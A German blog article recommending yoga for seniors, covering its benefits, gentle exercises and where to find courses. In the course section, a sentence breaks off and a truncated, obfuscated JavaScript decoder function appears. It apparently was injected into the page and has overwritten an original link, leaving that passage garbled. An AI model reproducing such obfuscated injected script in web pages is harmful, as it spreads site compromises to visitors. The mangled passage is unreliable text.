Yoga für Senioren – So bleiben Sie gesund und fit im Alter

Yoga für Senioren - Welche Übungen sind hilfreich?

 

Wer rastet, der rostet – Das Sprichwort ist hinlänglich bekannt. Besonders trifft dieses auf Senioren zu. Fit und beweglich bis ins hohe Alter bleiben ist ja der Wunsch vieler Menschen. Zudem ist heutzutage Alter ist gleich Alter. Ob man sich „alt“ fühlt, liegt oft an der Einstellung eines Menschen selber.
Das ändert jedoch nichts an der Tatsache, dass man etwas für seine Gesundheit tun sollte.
Yoga, als sportliche Alternative neben Gymnastik für Senioren, wird zunehmend beliebter und von der Krankenkasse bezahlt. Für ältere Personen gibt es eine besondere Form: Das Senioren-Yoga.

 

Was versteht man unter Yoga und warum ist es gut für Körper, Geist und Seele?

 

Yoga stammt ursprünglich aus Südasien, dem heutigen Indien, und ist ein bestimmtes ganzheitliches Übungssystem welches Geist, Körper und auch die Seele fit und so das Gleichgewicht des Körpers in Waage hält. Yoga kann auch kurz als „Einheit“ oder „Harmonie“ bezeichnet werden. Der Körper sollte im Gleichgewicht sein. Erst dann fühlt man sich wohl, geistig fit und körperlich gesund. Durch Yogaübungen werden alle Bereiche im Körper angesprochen. Das sind das Herz-Kreislaufsystem, die Muskulatur und der Gleichgewichtssinn. Alle Übungen und das Halten der unterschiedlichen Stellungen wirken sich auch auf den Geist aus. Zufriedenheit und Glück ergreift den Menschen in seiner Gesamtheit. So bleibt Körper (fast) automatisch gesund.

 

Durch Senioren-Yoga fit und gesund – auch im Alter

 

Sicherlich steht die Frage im Raum, was unterscheidet nun Yoga für Rentner von Yoga für die jüngere Generation?
Diese Frage ist relativ einfach zu beantworten. Ein junger Mensch belebt in der Regel seine Übungen durch mehr Kraftanstrengungen und kann seine Stellungen länger halten. Der Fachausdruck bei Yoga für Stellungen ist übrigens „Asanas“. Die Dehnübungen bei Yoga im Alter dauern einfach länger und sind entspannender. Aber auch hier gibt es verschiedene Arten von Yogaübungen zur Auswahl. Übungen für rüstige Rentner – Yoga für Senioren mit kleinen gesundheitlichen Einschränkungen. Das können Rückenschmerzen und Gelenkprobleme sein. Yoga für den Rücken ist dann eine empfehlenswerte Anwendung. Aber nicht verzagen, auch Yoga ist auch für Rentner möglich, die größere Einschränkungen haben. Sie können ihre gezielten Übungen auf einen Stuhl oder auf dem Boden ausführen. Hier ist besonders die Tiefenentspannung und Mediation von großer Bedeutung.
Aber gleich für welche Art von Yoga sich ein Rentner entscheidet, sie alle können den Blutdruck senken und Verdauungsbeschwerden lindern. Yoga Übungen für Anfänger sind für alle Rentner förderlich. Sie sollten sich nur an ein paar kleine Regeln halten.
 
Seniorenyoga ist in Gruppen leicht zu lernen

 

Gezieltes Yoga für Rentner – So geht´s

 

Empfehlenswert ist das Sukshma Yoga, auch sanftes Yoga genannt. Diese sind sehr leichte Übungen, die man überall durchführen kann. Bei diesem Yoga handelt es sich um ein Programm mit einer Zeitdauer von bis zu 30 Minuten pro Tag. Es sind sehr einfache, aber wirkungsvolle Übungen für den Nacken, die Hände, die Knien, die Fußgelenke und die Hüfte. Zudem können durch einige Übungen auch die Augen gestärkt werden. Egal in welcher Stellung diese Übungen ausgeführt werden, die Ausführung sollte bequem und standsicher sein. So ist jeder Rentner auf der sicheren Seite, besser eine leichtere Übung als gar keine. Viele Yogaübungen sind für die Gesundheit von Vorteil. Ein Rentner muss diese Übungen als leicht empfinden und er sollte sie gern machen.

 

Spezielle Yoga-Reisen helfen Senioren leicht Yogaübungen zu erlernen

 

Wo gibt es Yoga Kurse für Rentner?

 

Heutzutage haben viele Rentner einen Internetzugang und können mit dem Internet umgehen. Sie können sich jederzeit schlaumachen, wo Yogakurse für Rentner angeboten werden. Auch Yogaschulen und Wochenendseminare werden über das Internet in fast jeder Region Deutschlands angeboten. Zudem hat so mancher Seniorentreff sich auf Yoga mit eingespielt. Diese Treffen sind immer gut, da viele Senioren unter Einsamkeit leiden. So haben auch diese die Möglichkeiten neue Menschen kennenzulernen.
Es gibt Yogaschulen mit einen umfangreiche Yoga-Programm für Senioren. Zu Beginn kann oft eine kostenlose Schnupperstunde besucht werden. Diese Übungsstunde ist gut um einen ersten Einblick zu bekommen. Zudem gibt es unter function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6andere-spezialangebote/">Angeboten für spezielle Seniorenreisen auch Angebote für Yoga-Reisen.
Hier kann gemeinschaftlich Yoga für Anfänger spielerisch erlernt und auch genossen. Aber es besteht auch die Möglichkeit sich selber Yoga anzueignen. Es gibt jede Menge Bücher und DVDs mit praktischen Anwendungsbeispielen.

 

Fazit: Im Alter hält Yoga für Senioren jung

 

Yoga ist für ein höheres Alter bestens geeignet. Senioren profitieren davon und laufen mit gezielten Übungen ihrem Alter ein wenig davon. Yogaübungen können besonders wichtig sein, da ab einem gewissen Alter der Körper in all seinen Funktionen abbaut. Hier wirkt Yoga vorbeugend.
Yoga für Rentner hat umfassende gute körperliche Aspekte, auch der wache Geist wird so geschult. Körper, Geist und Seele bilden eine Einheit. Auch Rentner sollte aber zu Beginn ihrer Yoga-Karriere immer einen geschulten Yoga-Trainer an ihrer Seite haben. Im Laufe der Zeit werden diese gezielten sanften Übungen dann aber in "Fleisch und Blut" übergehen.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.